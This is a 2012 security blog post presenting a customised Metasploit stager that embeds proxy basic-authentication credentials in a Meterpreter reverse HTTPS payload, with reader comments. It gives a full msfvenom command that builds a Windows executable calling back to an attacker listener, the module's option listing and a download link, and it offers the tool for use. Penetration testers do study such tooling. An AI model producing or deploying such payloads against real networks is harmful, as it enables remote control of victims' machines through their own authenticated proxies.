Skip to content

Metasploit stager: reverse_https with basic authentication against proxy

by foip on October 13th, 2012

1. Introduction

If reverse_https does an amazing job by supporting proxy server and NTLM authentication, it exists some situations where the proxy server only manage basic authentication, and where you hold a valid pair of username and password.

Unlike NTLM, the username and password used during a basic authentication remains in the scope of the process (example: in your browser, after a successful authentication against the proxy server). This is the reason why reverse_http(s) doesn’t know anything about this password. Instead, reverse_http(s) stager use WinInet API to let Windows manages how to reach the Internet.

Back to our basic authentication mechanism, this customized version of reverse_https will let you embed a valid username and password inside the payload, to allow proper basic authentication against the proxy server. The proxy settings (IP, port, proxy.pac, …) are automatically managed by WinInet.

2. Usage example

2.1. EXE generation

msfvenom -p windows/meterpreter/reverse_https_proxy_basicauth \
  -f exe LPORT=443 LHOST=172.16.99.1 PROXY_AUTH_USER=mylongusername \
   PROXY_AUTH_PASS=mylongpassword123 > /tmp/msf.exe

2.2. Module info

msf  > info payload/windows/meterpreter/reverse_https_proxy_basicauth

       Name: Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager (proxy basic auth)
     Module: payload/windows/meterpreter/reverse_https_proxy_basicauth
    Version: 1, 15548, 14976
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 425
       Rank: Normal

Provided by:
  skape
  sf
  hdm

Basic options:
Name             Current Setting  Required  Description
----             ---------------  --------  -----------
EXITFUNC         process          yes       Exit technique: seh, thread, process, none
LHOST                             yes       The local listener hostname
LPORT            8443             yes       The local listener port
PROXY_AUTH_PASS  pass123          yes       Proxy authentication (password)
PROXY_AUTH_USER  username         yes       Proxy authentication (username)

Description:
  Tunnel communication over HTTP using SSL, using hardcoded proxy auth 
  settings, Inject the meterpreter server DLL via the Reflective Dll 
  Injection payload (staged)

3. Download

Link : reverse_https_proxy_basicauth.tar.gz

Enjoy :)

1 Star2 Stars3 Stars4 Stars5 Stars (3 votes, average: 4.67 out of 5)
Loading ... Loading ...

© 2012 – 2013, Fun Over IP. All rights reserved.

From → Hacking, Metasploit

9 Comments
  1. Great job !!!
    Did we need a proxy server to handle authentication ? TKS D:)

    • foip permalink

      Hi, Thanks for your comment!
      But, I’m not sure to understand your question :)

  2. Thanks for the great write up. I just want to ask why we need to specify the username/password in the handler? Don’t you think once the payload reaches our handler, all we need is just send the second stage and that is it. We don’t need to match each and every option for that matter.

    But really appreciate the great articles you have. The AV stuff is my favorite!

    • foip permalink

      Hi, thank you for your valuable remark.

      Indeed, there is absolutely no needs to provide the username/password in the handler. The goal was only to show the available options of the payload. They only make sense when used with an exploit module. Username/password of the proxy will not be used by multi/handler.
      So it is not a good example :)

      I will update the post asap.

      Thanks !

  3. damien permalink

    nice module. However..

    I think it will be good to have an optional field to indicate the ip address of the proxy instead of automatically getting with Winlnet. : )

    • foip permalink

      I did it at a first try but it didn’t work.
      Unfortunately, stage2 keep using wininet with autoconfig option for the proxy settings and then doesn’t use the IP you provided in stage1.
      Thanks for the comment.

      • damien permalink

        Hi,

        Do you mind to share with me the stage1 source code that you did which supports using proxy ip indicated as a setting? I do not know how to write stage1 for meterpreter however maybe can help to analyse and write on stage2?

        Thank you. : )

  4. damien permalink

    Hi,

    Just saw there is a project of doing a reverse https_proxy module that allow a proxy IP and port to be defined. https://github.com/rapid7/metasploit-framework/pull/1044 . I am wondering can you module be integrated with the upcoming new module?

    • foip permalink

      Hi Damien, and sorry for the delay of my responses about your two last comments..
      Thanks for pointing corelanc0d3r tool, looks very nice! My added “feature” is quite easy to implement, therefore I asked corelanc0d3r if it would be possible to add it in his project, as he already did the biggest part of the job. Didn’t get a reply yet, but will keep you up to date on that matter :)

      Cheers !

Leave a Reply

Note: XHTML is allowed. Your email address will never be published.

Subscribe to this comment feed via RSS


− one = 1

© 2010-2014 Fun Over IP All Rights Reserved -- Copyright notice by Blog Copyright